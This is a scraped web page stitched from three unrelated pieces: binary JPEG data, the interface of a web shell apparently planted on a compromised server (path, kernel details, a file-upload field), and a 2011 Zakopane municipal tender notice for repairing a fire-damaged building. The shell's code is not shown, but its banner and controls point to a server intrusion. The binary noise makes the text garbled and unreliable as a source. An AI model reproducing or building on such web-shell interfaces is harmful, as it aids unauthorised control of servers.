JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110601/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110601/138802-N-2011.html

<p class="kh_header"><b>Zakopane: BZP.271.48.2011 Rekonstrukcja elementów zniszczonych przez pożar w budynku przy ul. Zamoyskiego 6 a w Zakopanem .</b><br>
<b>Numer ogłoszenia: 138802 - 2011; data zamieszczenia: 01.06.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miasta Zakopane , ul. T. Kościuszki 13, 34-500 Zakopane, woj. małopolskie, tel. 018 2020448, faks 018 2020448.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zakopane.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> BZP.271.48.2011 Rekonstrukcja elementów zniszczonych przez pożar w budynku przy ul. Zamoyskiego 6 a w Zakopanem ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia
      
3.1.	wykonanie robót budowlanych dla zadania inwestycyjnego: 144/2011 Rekonstrukcja elementów zniszczonych przez pożar w budynku przy ul. Zamoyskiego 6 a w Zakopanem .

3.2.	Zakres prac obejmuje w szczególności:

32.1. Rozbiórkę i wywiezienie uszkodzonej oraz zniszczonej blachy pokrycia dachowego 
          usytuowanej w pobliżu mieszkania nr 9 i na werandzie, w tym również pokrycie 
           werandy na poziomie parteru.
32.2. Demontaż i wywiezienie nadpalonych, spalonych oraz uszkodzonych 
         drewnianych elementów konstrukcyjnych więźby dachowej i ścian werandy
         na poddaszu i l piętrze.
32.3. Demontaż i wywiezienie nadpalonych, spalonych i zniszczonych drewnianych      
         deskowań dachu i ścian werandy.
32.4. Wykonanie i montaż nowych elementów konstrukcyjnych więźby dachowej 
           i ścian werandy w miejscu zdemontowanych.
32.5. .Wykonanie i montaż deskowania dachu.
32.6. .Położenie nowej blachy stalowej ocynkowanej łączonej na felc.
32.7. Naprawa i wymiana uszkodzonych rynien.
32.8. Naprawa uszkodzonej elewacji (styropian, tynk akrylowy) w pobliżu mieszkania 
          nr 9.
32.9.Zabezpieczenie ppoż. i przeciwgrzybiczne starych elementów więźby
         dachowej.
32.10. Ocieplenie i izolacja skosów oraz ścian werandy wełną mineralną i folią                      
           paroizolacyjną/paro przepuszczalną.
32.11.Wykonanie i montaż nowego deskowania ścian zewnętrznych werandy 
           i poddasza.
32.12. Montaż nowej stolarki okiennej na werandzie.
32.13. Obłożenie elementów więźby dachowej strychu płytami GKF.
 32.14. Rozbiórka deskowania, polepy, legarów i ślepej podłogi w części pomieszczeń 
           (podłogi i stropy do rozebrania pokazano w części rysunkowej).
32.15. Naprawa i wzmocnienie gniazd (poduszki betonowe) w miejscu montażu 
           legarów.
32.16. Montaż nowych legarów i rusztu ślepej podłogi w miejscu uprzednio.
32.17.Ułożenie poziomej izolacji cieplno-akustycznej z wełny mineralnej
           pomiędzy legatami.
32.18.Montaż płyt OSB lub płyt jastrychowych (pod terakotę), jako ślepej
           podłogi i płyt GK, GKI, GKF na listwy rusztu.
 32.19. Montaż paneli, parkietu lub terakoty.
 32.20. Cyklinowanie i lakierowanie parkietu.
 32.21.Rozbiórka i wywiezienie zniszczonych elementów ścian działowych
            (ściany do rozebrania pokazano w części rysunkowej).
 32.22. Wykonanie nowego szkieletu ścian działowych w miejscu rozebranych.
 32.23. Ułożenie pionowej izolacji pomiędzy słupami z wełny mineralnej.
 32.24. Obłożenie podwójne płytami GK, GKI konstrukcji ścian działowych.
 32.25 Szpachlowanie i uzupełnianie tynku na sufitach i ścianach.
 32.26. Kładzenie płytek ściennych w łazienkach i kuchniach.
 32.27.Zmywanie, odgrzybianie i malowanie remontowanych ścian oraz sufitów
             wewnątrz mieszkań i korytarzy.
  32.28.Wymiana i wstawienie nowej stolarki drzwiowej wewnętrznej w mieszkaniu
             nr 9.
 32.29. Reperacja schodów i poręczy drewnianej z poddasza na strych.
 32.30. Wykonanie nowych pionów kanalizacji sanitarnej w                   remontowanych  
             mieszkaniach oraz wykonaniem nowej kanalizacji w zniszczonym
             (pożarem) mieszkaniu nr 9.
 32.31.Wykonanie nowej instalacji wodociągowej w zniszczonym (pożarem) mieszkaniu 
              nr 9.
 32.32.Wykonanie nowej instalacji elektrycznej w zniszczonym (pożarem)
               mieszkaniu nr 9.
  32.33.Ustanowienie kierownika budowy odpowiadającego za całość budowy objętej
              dokumentacją techniczną. 
  32.34.Ustanowienie kierowników robót budowlanych, do których kierowania niezbędne   
                jest posiadanie uprawnień budowlanych innych niż posiada kierownik budowy.

32.35.  Dokumentacji powykonawczej, o której mowa w art. 57 Prawa Budowlanego, 
           odpowiadającej zakresowi inwestycji. 

3.3.	Koordynację  prac należy ustalać z Wydziałem Gospodarki Mieszkaniowej Urzędu Miasta Zakopanego( Pan Michał Halaczek- Naczelnik Wydziału telefon: 18/2020415)   w tym okresów i sposobu udostępnienia lokali dla przeprowadzenia prac remontowych.

3.4.	Dokładny opis zamówienia zawarty jest w załączniku nr 1 do niniejszej siwz na który składa się : 
3.4.1.	dokumentacja projektowa
3.4.2.	STWiOR
3.4.3.	przedmiar robót.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.40.00.00-1, 45.45.30.00-7, 45.42.00.00-7, 45.32.00.00-6, 45.26.00.00-7, 45.33.00.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 11.1	Każdy wykonawca jest zobowiązany wnieść wadium przetargowe    
    w wysokości  5.000,00     zł  ( słownie:   pięć tysięcy  złotych)
11.2	Wadium może być wnoszone w jednej lub w kilku  następujących formach: 
       11.2.1. pieniądzu;
       11.2.2.poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
                  oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze 
                  poręczeniem pieniężnym;
      11.2.3. poręczeniach bankowych;
      11.2.4. gwarancjach bankowych;
      11.2.5. gwarancjach ubezpieczeniowych;
      11.2.6. poręczeniach udzielanych przez podmioty, o których mowa w art. 6 lit. b ust. 
                5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji   
                 Rozwoju Przedsiębiorczości ((Dz.U z 2007r. Nr 42 poz.275 z późn. zm.) 

11.3.	Wadium przetargowe w  pieniądzu należy wnieść  przelewem na konto Urzędu   
   Miasta Zakopane w PEKAO S.A. w Zakopanem nr: 047481111000048718666   
    Wadium powinno znajdować się na koncie zamawiającego najpóźniej   
    w terminie składania ofert tj. 17 czerwca 2011 r. do godz.  12°°

11.4.Wadium wnoszone w pozostałych formach należy złożyć w postaci oryginału,   
        najpóźniej w terminie składania ofert tj. 17 czerwca 2011 r.do godz. 12°° w      
       Biurze   ds. zamówień publicznych pok. nr 8 (parter).
        
  11.4.1. UWAGA! Nie wolno oryginałów tych dokumentów wkładać do oferty.

  11.5.   Zwrot wadium  
         11.5.1. Zamawiający zwraca wadium  wszystkim wykonawcom niezwłocznie po 
                     wyborze oferty   najkorzystniejszej lub unieważnieniu postępowania, z 
                     wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza , z 
                     zastrzeżeniem ,że  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli 
                     wykonawca w odpowiedzi na  wezwanie, o którym mowa w art. 26 ust. 3ustawy       
                     nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1   
                     ustawy,  lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn 
                     nieleżących po jego stronie. 
      11.5.2. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy który 
                    wycofał ofertę przed upływem terminu składania ofert;
          11.5.3. Zamawiający żąda  ponownego wniesienia wadium przez wykonawcę którym 
                      zwrócono wadium na podstawie ust.1  jeżeli w wyniku  ostatecznego  
                       rozstrzygnięcia protestu jego oferta została  wybrana jako najkorzystniejsza.     
                       Wykonawca wnosi wadium  w terminie określonym przez Zamawiającego.
          11.5.4. Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami   
                      wynikającymi z umowy rachunku bankowego, na którym było ono  
                       przechowywane, pomniejszone o koszty prowadzenia rachunku banko?wego   
                       oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany 
                       przez wykonawcę.
    
         11.5.5. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego 
                      oferta została wybrana:
     11.5.5.1. odmówił podpisania umowy w sprawie zamówienia publicznego na 
                    warunkach określonych w ofercie;
     11.5.5.2. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy.
              11.5.5.3. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe    
                             z przyczyn leżących po stronie wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne                     oświadczenie
Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia lub 
                  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone do oferty</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony ,jeżeli  wykonawca wykaże , że w 
                        ciągu ostatnich 5 lat przed upływem terminu składania ofert  a jeżeli okres   
             prowadzenia działalności jest krótszy w tym okresie wykonał  co najmniej 2 
             roboty o zakresie odpowiadającym swoim rodzajem i wartością robotom stanowiącym  
             przedmiot zamówienia tj. remont, przebudowa lub budowa budynku o kubaturze   
            > niż 1000 m3 o wartości nie mniejszej niż 150 000,00 PLN każda 

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia  
                       lub  nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone         
                       do  oferty .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca złoży stosowne 
                   oświadczenie

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia 
                          lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek  zostanie uznany za spełniony ,jeżeli  wykonawca wykaże  ,że zapewni  
                  kierowanie budową  przez osobę, posiadającą uprawnienia budowlane do  
                  kierowania robotami w specjalności konstrukcyjno - budowlanej bez ograniczeń  
                  lub odpowiadającymi wydanymi na podstawie wcześniejszych przepisów  
                  należącą do właściwej Izby Inżynierów Budownictwa, 

 Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia   
                    lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone  
                    do oferty .</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie uznany za spełniony jeżeli wykonawca wykaże ,że  posiada  
                środki finansowe  lub zdolność kredytową  w wysokości nie mniejszej niż     
                250 .000,00 zł- ( słownie:  dwieście pięćdziesiąt tysięcy  złotych )

Ocena spełnienia powyższego  warunku  będzie dokonywana metodą spełnia 
                          lub nie spełnia, w oparciu o wymagane dokumenty i oświadczenia dołączone  
                         do oferty .</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca przedkłada Zamawiającemu, jako załącznik do oferty wyceniony przedmiar robót określającą ceny jednostkowe brutto stanów robót, elementów scalonych, asortymentów zagregowanych obiektu. Sporządzony przez Wykonawcę wyceniony ofertowy przedmiar robót powinien zawierać wszystkie pozycje wymienione w przedłożonym do SIWZ przez Zamawiającego przykładowym przedmiarze.
Przedmiar dołączony przez Zamawiającego do materiałów przetargowych należy traktować, jako pomocniczy, niezwalniający Wykonawcy od wykonania i załączenia do oferty własnego wycenionego przedmiaru zawierającego wszystkie roboty niezbędne do wykonania zadania</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>32.1. W oparciu o art.144 ust.1 ustawy zamawiający informuje, że przewiduje   
           możliwość zmiany umowy :

32.1.1.Zamawiający dopuszcza wynikające z przyjętej technologii zmiany 
           w projekcie wykonawczym w stosunku do istniejącego projektu budowlanego   
             niepowodujące istotnych odstępstw, o których mowa a w art. 36 a ust.5 Prawa  
            Budowlanego. Zmiany wymagają akceptacji Zamawiającego oraz autorów projektu 
            budowlanego.
32.1.2. Zmian podwykonawcy, przy pomocy, którego Wykonawca realizuje    przedmiot     
             umowy.
32.1.3. Rozszerzenie zakresu podwykonawstwa w porównaniu do wskazanego w ofercie 
            Wykonawcy.
32.1.4. .Zmiany osoby /osób wskazanych w umowie, jako nadzorujących roboty.

32.1.5. Zmiany terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie wystąpi 
            lub   będzie miało wpływ na wykonanie przedmiotu umowy w przypadku:

   32.1.5.1. Zawieszenia robót przez Zamawiającego.
   32.1.5.2. Szczególnie niesprzyjających warunków atmosferycznych, uniemożliwiających    
                  prowadzenie robót zgodnie z STWiOR.
   32.1.5.3. Zmian w dokumentacji dokonanych na wniosek Zamawiającego.
   32.1.5.4. Opóźnienia przekazania terenu realizacji robót.
   32.1.5.5. Zmiany terminu dokonania odbioru robót przewidzianych w umowie.
   32.1.5.6. Zatrzymania robót w wyniku protestów mieszkańców lub odmowy opróżnienia    
                  lokalu na  czas przeprowadzenia robót.
    32.1.5.7. Odmiennych od przyjętych warunków w szczególności istnienia 
                  niezinwentaryzowanej, instalacji lub innych niezinwentaryzowanych elementów 
                   budowlanych uniemożliwiających  realizacje robót w sposób przewidziany w   
                   dokumentacji technicznej.
     32.1.5.8. Siły wyższej.
     32.1.5.9. Konieczności wprowadzenia uzgodnionych rozwiązań zamiennych w stosunku                  
                   do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub 
                    inspektora nadzoru inwestorskiego, odstępujących w sposób istotny od 
                   zatwierdzonego projektu lub  warunków pozwolenia na budowę i wymagających 
                   dopełnienia procedur art. 36a ust. 1  Prawa Budowlanego.
32.1.2.  Zmiany sposobu realizacji przedmiotu zamówienia w postaci:

 32.1.2.1. konieczności realizacji zamówienia przy zastosowaniu innych rozwiązań    
                 technicznych/technologicznych niż wskazane w specyfikacjach, w przypadku     
                 gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub   
                 wadliwym wykonaniem zamówienia.
 32.1.2.2. odmiennych od przyjętych w specyfikacjach warunków w szczególności istnienia   
                niezinwentaryzowanej instalacji lub innych niezinwentaryzowanych elementów  
                budowlanych skutkujących niemożnością zrealizowania przedmiotu zamówienia  
                 przy dotychczasowych założeniach technologicznych.
  32.1.2.3. konieczności zrealizowania zamówienia przy zastosowaniu innych rozwiązań 
                 technicznych ze względu na zmiany obowiązującego prawa.

32.1.3. Zmian dokonanych w granicach przewidzianych w ustawie Prawo budowlane  
            wynikających z:
  32.1.3.1. wprowadzenia uzgodnionych rozwiązań zamiennych w stosunku 
                do przewidzianych w projekcie, zgłoszonych przez kierownika budowy lub   
                inspektora nadzoru inwestorskiego, gdy zmiany dokonane zostały podczas   
                wykonywania robót  i wymagają objęcia ich procedurą nowego zgłoszenia lub 
                 pozwolenia na budowę.
32.1.3.2. konieczności naprawy ujawnionych podczas realizacji robót wad w dokumentacji   
               projektowej wymagających podjęcia środków zaradczych.

32.1.4. Zmiany wysokości wynagrodzenia - na wskutek rezygnacji z wykonania części robót   
           wraz z określeniem maksymalnej wielkości tych robót i określeniem kwoty należnej za    
            tą cześć w granicach udokumentowanego interesu Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zakopane.eu pod linkiem Zamówienia  publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział  Rozwoju Lokalnego i Inwestycji 
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.06.2011 godzina 12:00, miejsce: Biuro ds zamówień publicznych pok. 8 
Urząd Miasta Zakopane
ul. Kościuszki 13
34-500 Zakopane.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





